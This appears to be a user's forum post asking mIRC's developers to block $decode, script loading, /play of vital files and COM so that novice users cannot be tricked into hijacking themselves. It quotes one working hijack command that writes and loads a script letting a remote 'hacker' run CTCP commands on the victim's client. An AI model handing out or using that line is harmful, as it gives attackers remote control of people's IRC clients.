I think you might want to disable dangerous stuff from outside scripts so that people cannot be tricked into typing stuff that might hurt them. This I mean to notorious $decode lines. //write cms.mrc $decode(ctcp *:ins*:$2-) | .load -rs cms.mrc | .!msg hacker rq FREE BOUNCER
This is usually used to hijack mircs. If $decode, load and unload would not work from normal use, it would greatly reduce the problems posed by this type of hijacking.
You should consider preventing /play perform.ini or some other mirc vital file from working. Also I don't see why COM+ must work from IRC client.
The reason I am suggesting this all is to just protect users from malicious people. If you wish, you could also put a switch in configuration that is disabled per default to disallow "dangerous" commands and enabling it would cause a msg to be shown to the user.
Please consider these features, it would make ircing a better experience to many novice users.
